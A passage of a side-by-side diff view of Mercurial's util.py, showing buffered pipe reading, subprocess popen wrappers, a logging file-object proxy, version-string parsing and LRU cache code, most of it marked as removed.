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438 | def _frombuffer(self, size): |
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439 | """return at most 'size' data from the buffer |
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440 |
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441 | The data are removed from the buffer.""" |
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442 | if size == 0 or not self._buffer: |
|
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443 | return '' |
|
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444 | buf = self._buffer[0] |
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445 | if 1 < len(self._buffer): |
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446 | buf = ''.join(self._buffer) |
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447 |
|
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448 | data = buf[:size] |
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449 | buf = buf[len(data):] |
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450 | if buf: |
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451 | self._buffer = [buf] |
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452 | self._lenbuf = len(buf) |
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453 | else: |
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454 | self._buffer = [] |
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|||
455 | self._lenbuf = 0 |
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|||
456 | return data |
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457 |
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||||
458 | def _fillbuffer(self): |
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|||
459 | """read data to the buffer""" |
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|||
460 | data = os.read(self._input.fileno(), _chunksize) |
|
|||
461 | if not data: |
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462 | self._eof = True |
|
|||
463 | else: |
|
|||
464 | self._lenbuf += len(data) |
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|||
465 | self._buffer.append(data) |
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466 |
|
||||
467 | return data |
|
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468 |
|
||||
469 | def mmapread(fp): |
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|||
470 | try: |
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|||
471 | fd = getattr(fp, 'fileno', lambda: fp)() |
|
|||
472 | return mmap.mmap(fd, 0, access=mmap.ACCESS_READ) |
|
|||
473 | except ValueError: |
|
|||
474 | # Empty files cannot be mmapped, but mmapread should still work. Check |
|
|||
475 | # if the file is empty, and if so, return an empty buffer. |
|
|||
476 | if os.fstat(fd).st_size == 0: |
|
|||
477 | return '' |
|
|||
478 | raise |
|
|||
479 |
|
||||
480 | def popen2(cmd, env=None, newlines=False): |
|
|||
481 | # Setting bufsize to -1 lets the system decide the buffer size. |
|
|||
482 | # The default for bufsize is 0, meaning unbuffered. This leads to |
|
|||
483 | # poor performance on Mac OS X: http://bugs.python.org/issue4194 |
|
|||
484 | p = subprocess.Popen(cmd, shell=True, bufsize=-1, |
|
|||
485 | close_fds=closefds, |
|
|||
486 | stdin=subprocess.PIPE, stdout=subprocess.PIPE, |
|
|||
487 | universal_newlines=newlines, |
|
|||
488 | env=env) |
|
|||
489 | return p.stdin, p.stdout |
|
|||
490 |
|
||||
491 | def popen3(cmd, env=None, newlines=False): |
|
|||
492 | stdin, stdout, stderr, p = popen4(cmd, env, newlines) |
|
|||
493 | return stdin, stdout, stderr |
|
|||
494 |
|
||||
495 | def popen4(cmd, env=None, newlines=False, bufsize=-1): |
|
|||
496 | p = subprocess.Popen(cmd, shell=True, bufsize=bufsize, |
|
|||
497 | close_fds=closefds, |
|
|||
498 | stdin=subprocess.PIPE, stdout=subprocess.PIPE, |
|
|||
499 | stderr=subprocess.PIPE, |
|
|||
500 | universal_newlines=newlines, |
|
|||
501 | env=env) |
|
|||
502 | return p.stdin, p.stdout, p.stderr, p |
|
|||
503 |
|
||||
504 | class fileobjectproxy(object): |
|
|||
505 | """A proxy around file objects that tells a watcher when events occur. |
|
|||
506 |
|
||||
507 | This type is intended to only be used for testing purposes. Think hard |
|
|||
508 | before using it in important code. |
|
|||
509 | """ |
|
|||
510 | __slots__ = ( |
|
|||
511 | r'_orig', |
|
|||
512 | r'_observer', |
|
|||
513 | ) |
|
|||
514 |
|
||||
515 | def __init__(self, fh, observer): |
|
|||
516 | object.__setattr__(self, r'_orig', fh) |
|
|||
517 | object.__setattr__(self, r'_observer', observer) |
|
|||
518 |
|
||||
519 | def __getattribute__(self, name): |
|
|||
520 | ours = { |
|
|||
521 | r'_observer', |
|
|||
522 |
|
||||
523 | # IOBase |
|
|||
524 | r'close', |
|
|||
525 | # closed if a property |
|
|||
526 | r'fileno', |
|
|||
527 | r'flush', |
|
|||
528 | r'isatty', |
|
|||
529 | r'readable', |
|
|||
530 | r'readline', |
|
|||
531 | r'readlines', |
|
|||
532 | r'seek', |
|
|||
533 | r'seekable', |
|
|||
534 | r'tell', |
|
|||
535 | r'truncate', |
|
|||
536 | r'writable', |
|
|||
537 | r'writelines', |
|
|||
538 | # RawIOBase |
|
|||
539 | r'read', |
|
|||
540 | r'readall', |
|
|||
541 | r'readinto', |
|
|||
542 | r'write', |
|
|||
543 | # BufferedIOBase |
|
|||
544 | # raw is a property |
|
|||
545 | r'detach', |
|
|||
546 | # read defined above |
|
|||
547 | r'read1', |
|
|||
548 | # readinto defined above |
|
|||
549 | # write defined above |
|
|||
550 | } |
|
|||
551 |
|
||||
552 | # We only observe some methods. |
|
|||
553 | if name in ours: |
|
|||
554 | return object.__getattribute__(self, name) |
|
|||
555 |
|
||||
556 | return getattr(object.__getattribute__(self, r'_orig'), name) |
|
|||
557 |
|
||||
558 | def __delattr__(self, name): |
|
|||
559 | return delattr(object.__getattribute__(self, r'_orig'), name) |
|
|||
560 |
|
||||
561 | def __setattr__(self, name, value): |
|
|||
562 | return setattr(object.__getattribute__(self, r'_orig'), name, value) |
|
|||
563 |
|
||||
564 | def __iter__(self): |
|
|||
565 | return object.__getattribute__(self, r'_orig').__iter__() |
|
|||
566 |
|
||||
567 | def _observedcall(self, name, *args, **kwargs): |
|
|||
568 | # Call the original object. |
|
|||
569 | orig = object.__getattribute__(self, r'_orig') |
|
|||
570 | res = getattr(orig, name)(*args, **kwargs) |
|
|||
571 |
|
||||
572 | # Call a method on the observer of the same name with arguments |
|
|||
573 | # so it can react, log, etc. |
|
|||
574 | observer = object.__getattribute__(self, r'_observer') |
|
|||
575 | fn = getattr(observer, name, None) |
|
|||
576 | if fn: |
|
|||
577 | fn(res, *args, **kwargs) |
|
|||
578 |
|
||||
579 | return res |
|
|||
580 |
|
||||
581 | def close(self, *args, **kwargs): |
|
|||
582 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
583 | r'close', *args, **kwargs) |
|
|||
584 |
|
||||
585 | def fileno(self, *args, **kwargs): |
|
|||
586 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
587 | r'fileno', *args, **kwargs) |
|
|||
588 |
|
||||
589 | def flush(self, *args, **kwargs): |
|
|||
590 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
591 | r'flush', *args, **kwargs) |
|
|||
592 |
|
||||
593 | def isatty(self, *args, **kwargs): |
|
|||
594 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
595 | r'isatty', *args, **kwargs) |
|
|||
596 |
|
||||
597 | def readable(self, *args, **kwargs): |
|
|||
598 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
599 | r'readable', *args, **kwargs) |
|
|||
600 |
|
||||
601 | def readline(self, *args, **kwargs): |
|
|||
602 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
603 | r'readline', *args, **kwargs) |
|
|||
604 |
|
||||
605 | def readlines(self, *args, **kwargs): |
|
|||
606 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
607 | r'readlines', *args, **kwargs) |
|
|||
608 |
|
||||
609 | def seek(self, *args, **kwargs): |
|
|||
610 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
611 | r'seek', *args, **kwargs) |
|
|||
612 |
|
||||
613 | def seekable(self, *args, **kwargs): |
|
|||
614 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
615 | r'seekable', *args, **kwargs) |
|
|||
616 |
|
||||
617 | def tell(self, *args, **kwargs): |
|
|||
618 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
619 | r'tell', *args, **kwargs) |
|
|||
620 |
|
||||
621 | def truncate(self, *args, **kwargs): |
|
|||
622 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
623 | r'truncate', *args, **kwargs) |
|
|||
624 |
|
||||
625 | def writable(self, *args, **kwargs): |
|
|||
626 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
627 | r'writable', *args, **kwargs) |
|
|||
628 |
|
||||
629 | def writelines(self, *args, **kwargs): |
|
|||
630 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
631 | r'writelines', *args, **kwargs) |
|
|||
632 |
|
||||
633 | def read(self, *args, **kwargs): |
|
|||
634 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
635 | r'read', *args, **kwargs) |
|
|||
636 |
|
||||
637 | def readall(self, *args, **kwargs): |
|
|||
638 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
639 | r'readall', *args, **kwargs) |
|
|||
640 |
|
||||
641 | def readinto(self, *args, **kwargs): |
|
|||
642 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
643 | r'readinto', *args, **kwargs) |
|
|||
644 |
|
||||
645 | def write(self, *args, **kwargs): |
|
|||
646 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
647 | r'write', *args, **kwargs) |
|
|||
648 |
|
||||
649 | def detach(self, *args, **kwargs): |
|
|||
650 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
651 | r'detach', *args, **kwargs) |
|
|||
652 |
|
||||
653 | def read1(self, *args, **kwargs): |
|
|||
654 | return object.__getattribute__(self, r'_observedcall')( |
|
|||
655 | r'read1', *args, **kwargs) |
|
|||
656 |
|
||||
657 | class observedbufferedinputpipe(bufferedinputpipe): |
|
|||
658 | """A variation of bufferedinputpipe that is aware of fileobjectproxy. |
|
|||
659 |
|
||||
660 | ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that |
|
|||
661 | bypass ``fileobjectproxy``. Because of this, we need to make |
|
|||
662 | ``bufferedinputpipe`` aware of these operations. |
|
|||
663 |
|
||||
664 | This variation of ``bufferedinputpipe`` can notify observers about |
|
|||
665 | ``os.read()`` events. It also re-publishes other events, such as |
|
|||
666 | ``read()`` and ``readline()``. |
|
|||
667 | """ |
|
|||
668 | def _fillbuffer(self): |
|
|||
669 | res = super(observedbufferedinputpipe, self)._fillbuffer() |
|
|||
670 |
|
||||
671 | fn = getattr(self._input._observer, r'osread', None) |
|
|||
672 | if fn: |
|
|||
673 | fn(res, _chunksize) |
|
|||
674 |
|
||||
675 | return res |
|
|||
676 |
|
||||
677 | # We use different observer methods because the operation isn't |
|
|||
678 | # performed on the actual file object but on us. |
|
|||
679 | def read(self, size): |
|
|||
680 | res = super(observedbufferedinputpipe, self).read(size) |
|
|||
681 |
|
||||
682 | fn = getattr(self._input._observer, r'bufferedread', None) |
|
|||
683 | if fn: |
|
|||
684 | fn(res, size) |
|
|||
685 |
|
||||
686 | return res |
|
|||
687 |
|
||||
688 | def readline(self, *args, **kwargs): |
|
|||
689 | res = super(observedbufferedinputpipe, self).readline(*args, **kwargs) |
|
|||
690 |
|
||||
691 | fn = getattr(self._input._observer, r'bufferedreadline', None) |
|
|||
692 | if fn: |
|
|||
693 | fn(res) |
|
|||
694 |
|
||||
695 | return res |
|
|||
696 |
|
||||
697 | DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)} |
|
|||
698 | DATA_ESCAPE_MAP.update({ |
|
|||
699 | b'\\': b'\\\\', |
|
|||
700 | b'\r': br'\r', |
|
|||
701 | b'\n': br'\n', |
|
|||
702 | }) |
|
|||
703 | DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]') |
|
|||
704 |
|
||||
705 | def escapedata(s): |
|
|||
706 | return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s) |
|
|||
707 |
|
||||
708 | class fileobjectobserver(object): |
|
|||
709 | """Logs file object activity.""" |
|
|||
710 | def __init__(self, fh, name, reads=True, writes=True, logdata=False): |
|
|||
711 | self.fh = fh |
|
|||
712 | self.name = name |
|
|||
713 | self.logdata = logdata |
|
|||
714 | self.reads = reads |
|
|||
715 | self.writes = writes |
|
|||
716 |
|
||||
717 | def _writedata(self, data): |
|
|||
718 | if not self.logdata: |
|
|||
719 | self.fh.write('\n') |
|
|||
720 | return |
|
|||
721 |
|
||||
722 | # Simple case writes all data on a single line. |
|
|||
723 | if b'\n' not in data: |
|
|||
724 | self.fh.write(': %s\n' % escapedata(data)) |
|
|||
725 | return |
|
|||
726 |
|
||||
727 | # Data with newlines is written to multiple lines. |
|
|||
728 | self.fh.write(':\n') |
|
|||
729 | lines = data.splitlines(True) |
|
|||
730 | for line in lines: |
|
|||
731 | self.fh.write('%s> %s\n' % (self.name, escapedata(line))) |
|
|||
732 |
|
||||
733 | def read(self, res, size=-1): |
|
|||
734 | if not self.reads: |
|
|||
735 | return |
|
|||
736 | # Python 3 can return None from reads at EOF instead of empty strings. |
|
|||
737 | if res is None: |
|
|||
738 | res = '' |
|
|||
739 |
|
||||
740 | self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res))) |
|
|||
741 | self._writedata(res) |
|
|||
742 |
|
||||
743 | def readline(self, res, limit=-1): |
|
|||
744 | if not self.reads: |
|
|||
745 | return |
|
|||
746 |
|
||||
747 | self.fh.write('%s> readline() -> %d' % (self.name, len(res))) |
|
|||
748 | self._writedata(res) |
|
|||
749 |
|
||||
750 | def write(self, res, data): |
|
|||
751 | if not self.writes: |
|
|||
752 | return |
|
|||
753 |
|
||||
754 | self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res)) |
|
|||
755 | self._writedata(data) |
|
|||
756 |
|
||||
757 | def flush(self, res): |
|
|||
758 | if not self.writes: |
|
|||
759 | return |
|
|||
760 |
|
||||
761 | self.fh.write('%s> flush() -> %r\n' % (self.name, res)) |
|
|||
762 |
|
||||
763 | # For observedbufferedinputpipe. |
|
|||
764 | def bufferedread(self, res, size): |
|
|||
765 | self.fh.write('%s> bufferedread(%d) -> %d' % ( |
|
|||
766 | self.name, size, len(res))) |
|
|||
767 | self._writedata(res) |
|
|||
768 |
|
||||
769 | def bufferedreadline(self, res): |
|
|||
770 | self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res))) |
|
|||
771 | self._writedata(res) |
|
|||
772 |
|
||||
773 | def makeloggingfileobject(logh, fh, name, reads=True, writes=True, |
|
|||
774 | logdata=False): |
|
|||
775 | """Turn a file object into a logging file object.""" |
|
|||
776 |
|
||||
777 | observer = fileobjectobserver(logh, name, reads=reads, writes=writes, |
|
|||
778 | logdata=logdata) |
|
|||
779 | return fileobjectproxy(fh, observer) |
|
|||
780 |
|
||||
781 | def version(): |
|
|||
782 | """Return version information if available.""" |
|
|||
783 | try: |
|
|||
784 | from . import __version__ |
|
|||
785 | return __version__.version |
|
|||
786 | except ImportError: |
|
|||
787 | return 'unknown' |
|
|||
788 |
|
||||
789 | def versiontuple(v=None, n=4): |
|
|||
790 | """Parses a Mercurial version string into an N-tuple. |
|
|||
791 |
|
||||
792 | The version string to be parsed is specified with the ``v`` argument. |
|
|||
793 | If it isn't defined, the current Mercurial version string will be parsed. |
|
|||
794 |
|
||||
795 | ``n`` can be 2, 3, or 4. Here is how some version strings map to |
|
|||
796 | returned values: |
|
|||
797 |
|
||||
798 | >>> v = b'3.6.1+190-df9b73d2d444' |
|
|||
799 | >>> versiontuple(v, 2) |
|
|||
800 | (3, 6) |
|
|||
801 | >>> versiontuple(v, 3) |
|
|||
802 | (3, 6, 1) |
|
|||
803 | >>> versiontuple(v, 4) |
|
|||
804 | (3, 6, 1, '190-df9b73d2d444') |
|
|||
805 |
|
||||
806 | >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118') |
|
|||
807 | (3, 6, 1, '190-df9b73d2d444+20151118') |
|
|||
808 |
|
||||
809 | >>> v = b'3.6' |
|
|||
810 | >>> versiontuple(v, 2) |
|
|||
811 | (3, 6) |
|
|||
812 | >>> versiontuple(v, 3) |
|
|||
813 | (3, 6, None) |
|
|||
814 | >>> versiontuple(v, 4) |
|
|||
815 | (3, 6, None, None) |
|
|||
816 |
|
||||
817 | >>> v = b'3.9-rc' |
|
|||
818 | >>> versiontuple(v, 2) |
|
|||
819 | (3, 9) |
|
|||
820 | >>> versiontuple(v, 3) |
|
|||
821 | (3, 9, None) |
|
|||
822 | >>> versiontuple(v, 4) |
|
|||
823 | (3, 9, None, 'rc') |
|
|||
824 |
|
||||
825 | >>> v = b'3.9-rc+2-02a8fea4289b' |
|
|||
826 | >>> versiontuple(v, 2) |
|
|||
827 | (3, 9) |
|
|||
828 | >>> versiontuple(v, 3) |
|
|||
829 | (3, 9, None) |
|
|||
830 | >>> versiontuple(v, 4) |
|
|||
831 | (3, 9, None, 'rc+2-02a8fea4289b') |
|
|||
832 | """ |
|
|||
833 | if not v: |
|
|||
834 | v = version() |
|
|||
835 | parts = remod.split('[\+-]', v, 1) |
|
|||
836 | if len(parts) == 1: |
|
|||
837 | vparts, extra = parts[0], None |
|
|||
838 | else: |
|
|||
839 | vparts, extra = parts |
|
|||
840 |
|
||||
841 | vints = [] |
|
|||
842 | for i in vparts.split('.'): |
|
|||
843 | try: |
|
|||
844 | vints.append(int(i)) |
|
|||
845 | except ValueError: |
|
|||
846 | break |
|
|||
847 | # (3, 6) -> (3, 6, None) |
|
|||
848 | while len(vints) < 3: |
|
|||
849 | vints.append(None) |
|
|||
850 |
|
||||
851 | if n == 2: |
|
|||
852 | return (vints[0], vints[1]) |
|
|||
853 | if n == 3: |
|
|||
854 | return (vints[0], vints[1], vints[2]) |
|
|||
855 | if n == 4: |
|
|||
856 | return (vints[0], vints[1], vints[2], extra) |
|
|||
857 |
|
||||
858 | # used by parsedate |
|
21 | # used by parsedate | |
859 | defaultdateformats = ( |
|
22 | defaultdateformats = ( | |
860 | '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 |
|
23 | '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601 | |
@@ -897,1413 +60,6 b' extendeddateformats = defaultdateformats' | |||||
897 | "%b %Y", |
|
60 | "%b %Y", | |
898 | ) |
|
61 | ) | |
899 |
|
62 | |||
900 | def cachefunc(func): |
|
|||
901 | '''cache the result of function calls''' |
|
|||
902 | # XXX doesn't handle keywords args |
|
|||
903 | if func.__code__.co_argcount == 0: |
|
|||
904 | cache = [] |
|
|||
905 | def f(): |
|
|||
906 | if len(cache) == 0: |
|
|||
907 | cache.append(func()) |
|
|||
908 | return cache[0] |
|
|||
909 | return f |
|
|||
910 | cache = {} |
|
|||
911 | if func.__code__.co_argcount == 1: |
|
|||
912 | # we gain a small amount of time because |
|
|||
913 | # we don't need to pack/unpack the list |
|
|||
914 | def f(arg): |
|
|||
915 | if arg not in cache: |
|
|||
916 | cache[arg] = func(arg) |
|
|||
917 | return cache[arg] |
|
|||
918 | else: |
|
|||
919 | def f(*args): |
|
|||
920 | if args not in cache: |
|
|||
921 | cache[args] = func(*args) |
|
|||
922 | return cache[args] |
|
|||
923 |
|
||||
924 | return f |
|
|||
925 |
|
||||
926 | class cow(object): |
|
|||
927 | """helper class to make copy-on-write easier |
|
|||
928 |
|
||||
929 | Call preparewrite before doing any writes. |
|
|||
930 | """ |
|
|||
931 |
|
||||
932 | def preparewrite(self): |
|
|||
933 | """call this before writes, return self or a copied new object""" |
|
|||
934 | if getattr(self, '_copied', 0): |
|
|||
935 | self._copied -= 1 |
|
|||
936 | return self.__class__(self) |
|
|||
937 | return self |
|
|||
938 |
|
||||
939 | def copy(self): |
|
|||
940 | """always do a cheap copy""" |
|
|||
941 | self._copied = getattr(self, '_copied', 0) + 1 |
|
|||
942 | return self |
|
|||
943 |
|
||||
944 | class sortdict(collections.OrderedDict): |
|
|||
945 | '''a simple sorted dictionary |
|
|||
946 |
|
||||
947 | >>> d1 = sortdict([(b'a', 0), (b'b', 1)]) |
|
|||
948 | >>> d2 = d1.copy() |
|
|||
949 | >>> d2 |
|
|||
950 | sortdict([('a', 0), ('b', 1)]) |
|
|||
951 | >>> d2.update([(b'a', 2)]) |
|
|||
952 | >>> list(d2.keys()) # should still be in last-set order |
|
|||
953 | ['b', 'a'] |
|
|||
954 | ''' |
|
|||
955 |
|
||||
956 | def __setitem__(self, key, value): |
|
|||
957 | if key in self: |
|
|||
958 | del self[key] |
|
|||
959 | super(sortdict, self).__setitem__(key, value) |
|
|||
960 |
|
||||
961 | if pycompat.ispypy: |
|
|||
962 | # __setitem__() isn't called as of PyPy 5.8.0 |
|
|||
963 | def update(self, src): |
|
|||
964 | if isinstance(src, dict): |
|
|||
965 | src = src.iteritems() |
|
|||
966 | for k, v in src: |
|
|||
967 | self[k] = v |
|
|||
968 |
|
||||
969 | class cowdict(cow, dict): |
|
|||
970 | """copy-on-write dict |
|
|||
971 |
|
||||
972 | Be sure to call d = d.preparewrite() before writing to d. |
|
|||
973 |
|
||||
974 | >>> a = cowdict() |
|
|||
975 | >>> a is a.preparewrite() |
|
|||
976 | True |
|
|||
977 | >>> b = a.copy() |
|
|||
978 | >>> b is a |
|
|||
979 | True |
|
|||
980 | >>> c = b.copy() |
|
|||
981 | >>> c is a |
|
|||
982 | True |
|
|||
983 | >>> a = a.preparewrite() |
|
|||
984 | >>> b is a |
|
|||
985 | False |
|
|||
986 | >>> a is a.preparewrite() |
|
|||
987 | True |
|
|||
988 | >>> c = c.preparewrite() |
|
|||
989 | >>> b is c |
|
|||
990 | False |
|
|||
991 | >>> b is b.preparewrite() |
|
|||
992 | True |
|
|||
993 | """ |
|
|||
994 |
|
||||
995 | class cowsortdict(cow, sortdict): |
|
|||
996 | """copy-on-write sortdict |
|
|||
997 |
|
||||
998 | Be sure to call d = d.preparewrite() before writing to d. |
|
|||
999 | """ |
|
|||
1000 |
|
||||
1001 | class transactional(object): |
|
|||
1002 | """Base class for making a transactional type into a context manager.""" |
|
|||
1003 | __metaclass__ = abc.ABCMeta |
|
|||
1004 |
|
||||
1005 | @abc.abstractmethod |
|
|||
1006 | def close(self): |
|
|||
1007 | """Successfully closes the transaction.""" |
|
|||
1008 |
|
||||
1009 | @abc.abstractmethod |
|
|||
1010 | def release(self): |
|
|||
1011 | """Marks the end of the transaction. |
|
|||
1012 |
|
||||
1013 | If the transaction has not been closed, it will be aborted. |
|
|||
1014 | """ |
|
|||
1015 |
|
||||
1016 | def __enter__(self): |
|
|||
1017 | return self |
|
|||
1018 |
|
||||
1019 | def __exit__(self, exc_type, exc_val, exc_tb): |
|
|||
1020 | try: |
|
|||
1021 | if exc_type is None: |
|
|||
1022 | self.close() |
|
|||
1023 | finally: |
|
|||
1024 | self.release() |
|
|||
1025 |
|
||||
1026 | @contextlib.contextmanager |
|
|||
1027 | def acceptintervention(tr=None): |
|
|||
1028 | """A context manager that closes the transaction on InterventionRequired |
|
|||
1029 |
|
||||
1030 | If no transaction was provided, this simply runs the body and returns |
|
|||
1031 | """ |
|
|||
1032 | if not tr: |
|
|||
1033 | yield |
|
|||
1034 | return |
|
|||
1035 | try: |
|
|||
1036 | yield |
|
|||
1037 | tr.close() |
|
|||
1038 | except error.InterventionRequired: |
|
|||
1039 | tr.close() |
|
|||
1040 | raise |
|
|||
1041 | finally: |
|
|||
1042 | tr.release() |
|
|||
1043 |
|
||||
1044 | @contextlib.contextmanager |
|
|||
1045 | def nullcontextmanager(): |
|
|||
1046 | yield |
|
|||
1047 |
|
||||
1048 | class _lrucachenode(object): |
|
|||
1049 | """A node in a doubly linked list. |
|
|||
1050 |
|
||||
1051 | Holds a reference to nodes on either side as well as a key-value |
|
|||
1052 | pair for the dictionary entry. |
|
|||
1053 | """ |
|
|||
1054 | __slots__ = (u'next', u'prev', u'key', u'value') |
|
|||
1055 |
|
||||
1056 | def __init__(self): |
|
|||
1057 | self.next = None |
|
|||
1058 | self.prev = None |
|
|||
1059 |
|
||||
1060 | self.key = _notset |
|
|||
1061 | self.value = None |
|
|||
1062 |
|
||||
1063 | def markempty(self): |
|
|||
1064 | """Mark the node as emptied.""" |
|
|||
1065 | self.key = _notset |
|
|||
1066 |
|
||||
1067 | class lrucachedict(object): |
|
|||
1068 | """Dict that caches most recent accesses and sets. |
|
|||
1069 |
|
||||
1070 | The dict consists of an actual backing dict - indexed by original |
|
|||
1071 | key - and a doubly linked circular list defining the order of entries in |
|
|||
1072 | the cache. |
|
|||
1073 |
|
||||
1074 | The head node is the newest entry in the cache. If the cache is full, |
|
|||
1075 | we recycle head.prev and make it the new head. Cache accesses result in |
|
|||
1076 | the node being moved to before the existing head and being marked as the |
|
|||
1077 | new head node. |
|
|||
1078 | """ |
|
|||
1079 | def __init__(self, max): |
|
|||
1080 | self._cache = {} |
|
|||
1081 |
|
||||
1082 | self._head = head = _lrucachenode() |
|
|||
1083 | head.prev = head |
|
|||
1084 | head.next = head |
|
|||
1085 | self._size = 1 |
|
|||
1086 | self._capacity = max |
|
|||
1087 |
|
||||
1088 | def __len__(self): |
|
|||
1089 | return len(self._cache) |
|
|||
1090 |
|
||||
1091 | def __contains__(self, k): |
|
|||
1092 | return k in self._cache |
|
|||
1093 |
|
||||
1094 | def __iter__(self): |
|
|||
1095 | # We don't have to iterate in cache order, but why not. |
|
|||
1096 | n = self._head |
|
|||
1097 | for i in range(len(self._cache)): |
|
|||
1098 | yield n.key |
|
|||
1099 | n = n.next |
|
|||
1100 |
|
||||
1101 | def __getitem__(self, k): |
|
|||
1102 | node = self._cache[k] |
|
|||
1103 | self._movetohead(node) |
|
|||
1104 | return node.value |
|
|||
1105 |
|
||||
1106 | def __setitem__(self, k, v): |
|
|||
1107 | node = self._cache.get(k) |
|
|||
1108 | # Replace existing value and mark as newest. |
|
|||
1109 | if node is not None: |
|
|||
1110 | node.value = v |
|
|||
1111 | self._movetohead(node) |
|
|||
1112 | return |
|
|||
1113 |
|
||||
1114 | if self._size < self._capacity: |
|
|||
1115 | node = self._addcapacity() |
|
|||
1116 | else: |
|
|||
1117 | # Grab the last/oldest item. |
|
|||
1118 | node = self._head.prev |
|
|||
1119 |
|
||||
1120 | # At capacity. Kill the old entry. |
|
|||
1121 | if node.key is not _notset: |
|
|||
1122 | del self._cache[node.key] |
|
|||
1123 |
|
||||
1124 | node.key = k |
|
|||
1125 | node.value = v |
|
|||
1126 | self._cache[k] = node |
|
|||
1127 | # And mark it as newest entry. No need to adjust order since it |
|
|||
1128 | # is already self._head.prev. |
|
|||
1129 | self._head = node |
|
|||
1130 |
|
||||
1131 | def __delitem__(self, k): |
|
|||
1132 | node = self._cache.pop(k) |
|
|||
1133 | node.markempty() |
|
|||
1134 |
|
||||
1135 | # Temporarily mark as newest item before re-adjusting head to make |
|
|||
1136 | # this node the oldest item. |
|
|||
1137 | self._movetohead(node) |
|
|||
1138 | self._head = node.next |
|
|||
1139 |
|
||||
1140 | # Additional dict methods. |
|
|||
1141 |
|
||||
1142 | def get(self, k, default=None): |
|
|||
1143 | try: |
|
|||
1144 | return self._cache[k].value |
|
|||
1145 | except KeyError: |
|
|||
1146 | return default |
|
|||
1147 |
|
||||
1148 | def clear(self): |
|
|||
1149 | n = self._head |
|
|||
1150 | while n.key is not _notset: |
|
|||
1151 | n.markempty() |
|
|||
1152 | n = n.next |
|
|||
1153 |
|
||||
1154 | self._cache.clear() |
|
|||
1155 |
|
||||
1156 | def copy(self): |
|
|||
1157 | result = lrucachedict(self._capacity) |
|
|||
1158 | n = self._head.prev |
|
|||
1159 | # Iterate in oldest-to-newest order, so the copy has the right ordering |
|
|||
1160 | for i in range(len(self._cache)): |
|
|||
1161 | result[n.key] = n.value |
|
|||
1162 | n = n.prev |
|
|||
1163 | return result |
|
|||
1164 |
|
||||
1165 | def _movetohead(self, node): |
|
|||
1166 | """Mark a node as the newest, making it the new head. |
|
|||
1167 |
|
||||
1168 | When a node is accessed, it becomes the freshest entry in the LRU |
|
|||
1169 | list, which is denoted by self._head. |
|
|||
1170 |
|
||||
1171 | Visually, let's make ``N`` the new head node (* denotes head): |
|
|||
1172 |
|
||||
1173 | previous/oldest <-> head <-> next/next newest |
|
|||
1174 |
|
||||
1175 | ----<->--- A* ---<->----- |
|
|||
1176 | | | |
|
|||
1177 | E <-> D <-> N <-> C <-> B |
|
|||
1178 |
|
||||
1179 | To: |
|
|||
1180 |
|
||||
1181 | ----<->--- N* ---<->----- |
|
|||
1182 | | | |
|
|||
1183 | E <-> D <-> C <-> B <-> A |
|
|||
1184 |
|
||||
1185 | This requires the following moves: |
|
|||
1186 |
|
||||
1187 | C.next = D (node.prev.next = node.next) |
|
|||
1188 | D.prev = C (node.next.prev = node.prev) |
|
|||
1189 | E.next = N (head.prev.next = node) |
|
|||
1190 | N.prev = E (node.prev = head.prev) |
|
|||
1191 | N.next = A (node.next = head) |
|
|||
1192 | A.prev = N (head.prev = node) |
|
|||
1193 | """ |
|
|||
1194 | head = self._head |
|
|||
1195 | # C.next = D |
|
|||
1196 | node.prev.next = node.next |
|
|||
1197 | # D.prev = C |
|
|||
1198 | node.next.prev = node.prev |
|
|||
1199 | # N.prev = E |
|
|||
1200 | node.prev = head.prev |
|
|||
1201 | # N.next = A |
|
|||
1202 | # It is tempting to do just "head" here, however if node is |
|
|||
1203 | # adjacent to head, this will do bad things. |
|
|||
1204 | node.next = head.prev.next |
|
|||
1205 | # E.next = N |
|
|||
1206 | node.next.prev = node |
|
|||
1207 | # A.prev = N |
|
|||
1208 | node.prev.next = node |
|
|||
1209 |
|
||||
1210 | self._head = node |
|
|||
1211 |
|
||||
1212 | def _addcapacity(self): |
|
|||
1213 | """Add a node to the circular linked list. |
|
|||
1214 |
|
||||
1215 | The new node is inserted before the head node. |
|
|||
1216 | """ |
|
|||
1217 | head = self._head |
|
|||
1218 | node = _lrucachenode() |
|
|||
1219 | head.prev.next = node |
|
|||
1220 | node.prev = head.prev |
|
|||
1221 | node.next = head |
|
|||
1222 | head.prev = node |
|
|||
1223 | self._size += 1 |
|
|||
1224 | return node |
|
|||
1225 |
|
||||
1226 | def lrucachefunc(func): |
|
|||
1227 | '''cache most recent results of function calls''' |
|
|||
1228 | cache = {} |
|
|||
1229 | order = collections.deque() |
|
|||
1230 | if func.__code__.co_argcount == 1: |
|
|||
1231 | def f(arg): |
|
|||
1232 | if arg not in cache: |
|
|||
1233 | if len(cache) > 20: |
|
|||
1234 | del cache[order.popleft()] |
|
|||
1235 | cache[arg] = func(arg) |
|
|||
1236 | else: |
|
|||
1237 | order.remove(arg) |
|
|||
1238 | order.append(arg) |
|
|||
1239 | return cache[arg] |
|
|||
1240 | else: |
|
|||
